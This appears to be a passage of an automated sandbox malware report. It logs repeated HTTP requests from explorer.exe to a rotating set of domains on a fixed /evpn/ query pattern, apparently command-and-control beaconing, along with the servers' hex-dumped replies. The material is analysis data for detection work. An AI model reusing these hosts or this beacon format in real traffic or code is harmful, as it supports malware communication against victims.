                                                                        Apr 8, 2021 11:10:00.650544882 CEST1373INData Raw: 32 42 76 32 79 39 64 48 6a 58 43 78 55 51 58 50 38 36 59 44 70 51 52 6f 67 50 34 59 25 33 44 26 70 72 76 74 6f 66 3d 64 6a 46 41 38 68 64 59 64 78 56 52 37 64 72 25 32 42 34 71 51 36 41 69 25 32 42 4b 7a 44 43 4a 53 61 4a 50 75 50 7a 79 4c 4f 6e
                                                                        Data Ascii: 2Bv2y9dHjXCxUQXP86YDpQRogP4Y%3D&prvtof=djFA8hdYdxVR7dr%2B4qQ6Ai%2BKzDCJSaJPuPzyLOnSIM4%3D&poru=oAQe3Y1XSeo0UqllFwmgg%2Fdjf2BSR1FA%2FyNyqCDOXzNfh5I7wYiIimAj25fYJnMumUpgfO%2FGXlEYFXrLrHKCsGrABIHQIGEWpjl4cTQ090eA2rSpviTChWkMxz0D1I5PfX5NRj2gdLxkEY


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        1192.168.2.34972723.227.38.7480C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:10:05.937941074 CEST1395OUTGET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.kinfet.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:06.077676058 CEST1396INHTTP/1.1 403 Forbidden
                                                                        Date: Thu, 08 Apr 2021 09:10:06 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        X-Sorting-Hat-PodId: -1
                                                                        X-Dc: gcp-us-east1
                                                                        X-Request-ID: da345f65-3dc9-46ad-8b16-fd94fcfb308a
                                                                        Set-Cookie: _shopify_fs=2021-04-08T09%3A10%3A06Z; Expires=Fri, 08-Apr-22 09:10:06 GMT; Domain=kinfet.com; Path=/; SameSite=Lax
                                                                        X-XSS-Protection: 1; mode=block
                                                                        X-Download-Options: noopen
                                                                        X-Content-Type-Options: nosniff
                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                        CF-Cache-Status: DYNAMIC
                                                                        cf-request-id: 095258057e0000cc5abf907000000001
                                                                        Server: cloudflare
                                                                        CF-RAY: 63ca5c4f2f01cc5a-ZRH
                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                        Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72
                                                                        Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4r
                                                                        Apr 8, 2021 11:10:06.077707052 CEST1398INData Raw: 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d
                                                                        Data Ascii: em 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1
                                                                        Apr 8, 2021 11:10:06.077727079 CEST1399INData Raw: 20 22 70 74 2d 42 52 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 65 73 73 6f 20 6e 65 67 61 64 6f 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 56 6f 63 c3 aa 20 6e c3 a3 6f 20 74 65 6d 20 70 65 72
                                                                        Data Ascii: "pt-BR": { "title": "Acesso negado", "content-title": "Voc no tem permisso para acessar este site" }, "es": { "title": "Acceso denegado", "content-title": "No tienes permiso para acceder a esta pgina web" }, "k
                                                                        Apr 8, 2021 11:10:06.077747107 CEST1400INData Raw: 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 59 6f 75 20 64 6f 20 6e 6f 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 77 65 62 73 69 74 65 22 0a 20 20 7d 2c 0a 20 20 22 68 69 22 3a 20 7b
                                                                        Data Ascii: content-title": "You do not have permission to access this website" }, "hi": { "title": " ", "content-title": "
                                                                        Apr 8, 2021 11:10:06.077764034 CEST1401INData Raw: 20 3c 3d 20 31 30 0a 20 20 20 20 22 65 6e 22 3b 0a 20 20 6c 61 6e 67 75 61 67 65 20 3d 20 6c 61 6e 67 75 61 67 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3b 20 2f 2f 20 53 74 72 69 70 20 63 6f 75 6e 74 72 79 20 63 6f 64 65 0a 20 20 74 72 61 6e
                                                                        Data Ascii: <= 10 "en"; language = language.split("-")[0]; // Strip country code translations = t[language] || t["en"]; // Replace content on screen for (var id in translations) { target = document.querySelector("[data-i18n=" + id + "]");
                                                                        Apr 8, 2021 11:10:06.077776909 CEST1401INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        10192.168.2.34974434.102.136.18080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:11:04.175527096 CEST5167OUTGET /evpn/?JDK8ix=lIAMQw8Bc5WvbtZzc5MVHUptsiPc1Sl8tBJqhUvlbuUAA7ypaYYvmQWduCHy/+CL3sQ0&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.curiosityisthecurebook.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:11:04.291693926 CEST5167INHTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Thu, 08 Apr 2021 09:11:04 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "6063a886-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        11192.168.2.349745192.185.48.19480C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:11:09.627645969 CEST5168OUTGET /evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.usinggroovefunnels.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:11:09.776088953 CEST5169INHTTP/1.1 301 Moved Permanently
                                                                        Date: Thu, 08 Apr 2021 09:11:09 GMT
                                                                        Server: Apache
                                                                        Location: http://bitly.ws/9qZUevpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihu
                                                                        Content-Length: 326
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 69 74 6c 79 2e 77 73 2f 39 71 5a 55 65 76 70 6e 2f 3f 4a 44 4b 38 69 78 3d 49 53 74 73 34 67 62 4d 68 71 79 75 54 6d 4b 72 53 48 5a 6d 6f 67 6e 42 39 37 4e 76 46 45 32 42 5a 70 35 79 59 74 63 30 64 38 49 38 34 55 4c 74 4e 52 54 50 6a 54 57 6c 4f 44 4c 4b 37 43 70 6b 79 74 4e 46 26 61 6d 70 3b 77 34 3d 6a 46 4e 70 33 36 49 68 75 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://bitly.ws/9qZUevpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&amp;w4=jFNp36Ihu">here</a>.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        12192.168.2.34974634.102.136.18080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:11:14.840365887 CEST5170OUTGET /evpn/?JDK8ix=uC/MtWgv+YrXZeFWxw8c+UMLGaJCPPY/UiwLcWwP6A/e3Dk62IKxdmGhKI0+YBSelN0N&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.cgpizza.net
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:11:14.966414928 CEST5170INHTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Thu, 08 Apr 2021 09:11:14 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "606abe1d-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        13192.168.2.34974752.58.78.1680C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:11:20.052567959 CEST5171OUTGET /evpn/?JDK8ix=mJ1WicGgYxGiPfNmi48PwwH9NxkuMiIXMjFvraRfIBMfYxjrtIxgIRAmB9RzgRW7JS2o&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.physicalrobot.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:11:20.070189953 CEST5172INHTTP/1.1 410 Gone
                                                                        Server: openresty/1.13.6.2
                                                                        Date: Thu, 08 Apr 2021 09:10:31 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 31 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 70 68 79 73 69 63 61 6c 72 6f 62 6f 74 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 64 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 70 68 79 73 69 63 61 6c 72 6f 62 6f 74 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 7<html>9 <head>51 <meta http-equiv='refresh' content='5; url=http://www.physicalrobot.com/' />a </head>9 <body>3d You are being redirected to http://www.physicalrobot.coma </body>8</html>0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        14192.168.2.349748208.91.197.9180C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:11:25.228843927 CEST5172OUTGET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.jamessicilia.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:11:25.415476084 CEST5174INHTTP/1.1 200 OK
                                                                        Date: Thu, 08 Apr 2021 09:11:25 GMT
                                                                        Server: Apache
                                                                        Set-Cookie: vsid=928vr3654186853404344; expires=Tue, 07-Apr-2026 09:11:25 GMT; Max-Age=157680000; path=/; domain=www.jamessicilia.com; HttpOnly
                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Ru1fD82/Yqs+3Zye7dtXUZ/oJiDw2u1OxPgHM8xCyLYyWaTMGCWQidzM+A86L7os7uHpkd6J4BLmsTmMgA8SfQ==
                                                                        Content-Length: 2565
                                                                        Keep-Alive: timeout=5, max=123
                                                                        Connection: Keep-Alive
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Data Raw: 3c 21 2d 2d 0d 0a 09 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6a 61 6d 65 73 73 69 63 69 6c 69 61 2e 63 6f 6d 2f 3f 66 70 3d 78 69 77 37 61 7a 43 7a 4b 7a 31 25 32 42 58 56 56 6a 32 6c 67 6b 4b 25 32 42 65 6d 6a 5a 59 64 34 66 38 46 31 59 48 75 64 43 34 43 42 55 32 57 25 32 46 42 63 4c 39 58 38 25 32 42 52 58 71 69 34 75 61 44 52 44 7a 71 45 4d 56 4b 43 32 61 64 6a 59 73 7a 52 59 35 33 7a 44 63 42 32 63 46 4a 31 30 37 47 44 4d 44 72 4a 41 52 4f 4b 30 45 6f 71 55 64 72 48 36 45 66 4e 4f 37 37 65 63 34 4b 53 74 56 37 51 4f 6a 39 58 72 6c 78 66 4f 68 6c 69 49 78 25 32 42 4d 66 41 4c 4a 36 49 65 6b 6b 25 32 42 63 68 44 68 57 32 53 47 73 79 59 75 50 52 6e 50 6c 6f 25 32 46 6b 25 33 44 26 70 72 76 74 6f 66 3d 43 64 68 67 43 46 6c 36 4b 77 64 62 57 6c 39 72 5a 6c 6a 49 5a 49 4a 47 5a 78 62 36 63 64 70 30 48 67 25 32 46 6e 53 56 72 57 4c 4c 59 25 33 44 26 70 6f 72 75 3d 4d 52 63 76 30 30 38 43 6d 4f 50 52 34 37 65 55 5a 46 6f 25 32 42 41 51 79 49 56 6f 47 78 57 51 67 4d 75 65 5a 51 4f 30 4c 58 73 77 70 4e 46 49 7a 63 47 38 39 55 66 68 63 74 41 37 76 74 65 38 5a 6b 46 54 78 66 42 4e 72 38 70 25 32 42 37 65 45 5a 44 6a 4e 45 4f 4f 48 57 46 78 50 54 66 76 30 4c 66 75 25 32 42 61 59 54 7a 68 4a 68 63 58 58 46 25 32 42 6d 57 64 63 73 51 4a 38 72 67 4d 49 33 49 35 69 77 6e 6f 4a 37 58 52 44 30 70 7a 33 4f 57 48 76 6e 4b 65 7a 55 75 64 54 77 45 43 68 48 6e 4b 65 63 4d 75 51 77 71 35 77 77 53 62 46 43 43 54 73 75 6d 33 67 30 39 51 4c 6c 52 64 4b 53 4f 45 6e 6e 6e 79 26 63 69 66 72 3d 31 26 4a 44 4b 38 69 78 3d 66 68 72 5a 42 6a 78 61 49 30 57 44 72 4f 4d 4d 4c 42 39 69 25 32 46 65 54 63 72 58 72 51 78 75 67 78 2b 6a 67 6f 6a 6d 37 42 41 64 36 66 42 65 36 34 4a 69 4f 57 6c 69 53 43 7a 66 55 6a 50 69 72 4a 7a 4a 43 6d 26 77 34 3d 6a 46 4e 70 33 36 49 68 75 22 3b 0d 0a 09 2f 2a 0d 0a 2d 2d 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45
                                                                        Data Ascii: ...top.location="http://www.jamessicilia.com/?fp=xiw7azCzKz1%2BXVVj2lgkK%2BemjZYd4f8F1YHudC4CBU2W%2FBcL9X8%2BRXqi4uaDRDzqEMVKC2adjYszRY53zDcB2cFJ107GDMDrJAROK0EoqUdrH6EfNO77ec4KStV7QOj9XrlxfOhliIx%2BMfALJ6Iekk%2BchDhW2SGsyYuPRnPlo%2Fk%3D&prvtof=CdhgCFl6KwdbWl9rZljIZIJGZxb6cdp0Hg%2FnSVrWLLY%3D&poru=MRcv008CmOPR47eUZFo%2BAQyIVoGxWQgMueZQO0LXswpNFIzcG89UfhctA7vte8ZkFTxfBNr8p%2B7eEZDjNEOOHWFxPTfv0Lfu%2BaYTzhJhcXXF%2BmWdcsQJ8rgMI3I5iwnoJ7XRD0pz3OWHvnKezUudTwEChHnKecMuQwq5wwSbFCCTsum3g09QLlRdKSOEnnny&cifr=1&JDK8ix=fhrZBjxaI0WDrOMMLB9i%2FeTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu";/*--><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwE
                                                                        Apr 8, 2021 11:11:25.415529013 CEST5175INData Raw: 41 41 51 3d 3d 5f 52 75 31 66 44 38 32 2f 59 71 73 2b 33 5a 79 65 37 64 74 58 55 5a 2f 6f 4a 69 44 77 32 75 31 4f 78 50 67 48 4d 38 78 43 79 4c 59 79 57 61 54 4d 47 43 57 51 69 64 7a 4d 2b 41 38 36 4c 37 6f 73 37 75 48 70 6b 64 36 4a 34 42 4c 6d
                                                                        Data Ascii: AAQ==_Ru1fD82/Yqs+3Zye7dtXUZ/oJiDw2u1OxPgHM8xCyLYyWaTMGCWQidzM+A86L7os7uHpkd6J4BLmsTmMgA8SfQ=="><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="viewport" content="width=device-width"><meta h
                                                                        Apr 8, 2021 11:11:25.415555954 CEST5176INData Raw: 32 42 4d 66 41 4c 4a 36 49 65 6b 6b 25 32 42 63 68 44 68 57 32 53 47 73 79 59 75 50 52 6e 50 6c 6f 25 32 46 6b 25 33 44 26 70 72 76 74 6f 66 3d 4b 32 4c 36 4b 73 4d 4a 38 6f 70 4a 30 6f 42 64 41 33 6b 4b 46 38 68 62 55 68 67 58 6f 70 43 48 4e 25
                                                                        Data Ascii: 2BMfALJ6Iekk%2BchDhW2SGsyYuPRnPlo%2Fk%3D&prvtof=K2L6KsMJ8opJ0oBdA3kKF8hbUhgXopCHN%2Fg6BqMmqWQ%3D&poru=RZvjpJIKQ4qwx1%2BpawRJAGSfw3rk1RhB9hZlcu5WLRHdhio6e6RiHSzAv0rvoungdK5Ti6tuxfsZClc9csUeRzxRaR7LQzhx%2F0f0%2BvUdzwuNTbWj2fd%2F1e7GZXtmxyBd8%2BG
                                                                        Apr 8, 2021 11:11:25.466644049 CEST5176INData Raw: 32 42 4d 66 41 4c 4a 36 49 65 6b 6b 25 32 42 63 68 44 68 57 32 53 47 73 79 59 75 50 52 6e 50 6c 6f 25 32 46 6b 25 33 44 26 70 72 76 74 6f 66 3d 4b 32 4c 36 4b 73 4d 4a 38 6f 70 4a 30 6f 42 64 41 33 6b 4b 46 38 68 62 55 68 67 58 6f 70 43 48 4e 25
                                                                        Data Ascii: 2BMfALJ6Iekk%2BchDhW2SGsyYuPRnPlo%2Fk%3D&prvtof=K2L6KsMJ8opJ0oBdA3kKF8hbUhgXopCHN%2Fg6BqMmqWQ%3D&poru=RZvjpJIKQ4qwx1%2BpawRJAGSfw3rk1RhB9hZlcu5WLRHdhio6e6RiHSzAv0rvoungdK5Ti6tuxfsZClc9csUeRzxRaR7LQzhx%2F0f0%2BvUdzwuNTbWj2fd%2F1e7GZXtmxyBd8%2BG


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        15192.168.2.34974923.227.38.7480C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:11:30.437684059 CEST5177OUTGET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.kinfet.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:11:30.573548079 CEST5178INHTTP/1.1 403 Forbidden
                                                                        Date: Thu, 08 Apr 2021 09:11:30 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        X-Sorting-Hat-PodId: -1
                                                                        X-Dc: gcp-us-east1
                                                                        X-Request-ID: be2a510c-ab66-4b1d-9209-9129da9b5271
                                                                        Set-Cookie: _shopify_fs=2021-04-08T09%3A11%3A30Z; Expires=Fri, 08-Apr-22 09:11:30 GMT; Domain=kinfet.com; Path=/; SameSite=Lax
                                                                        X-Content-Type-Options: nosniff
                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                        X-XSS-Protection: 1; mode=block
                                                                        X-Download-Options: noopen
                                                                        CF-Cache-Status: DYNAMIC
                                                                        cf-request-id: 0952594f8f000023f7b5019000000001
                                                                        Server: cloudflare
                                                                        CF-RAY: 63ca5e5f4d0b23f7-ZRH
                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
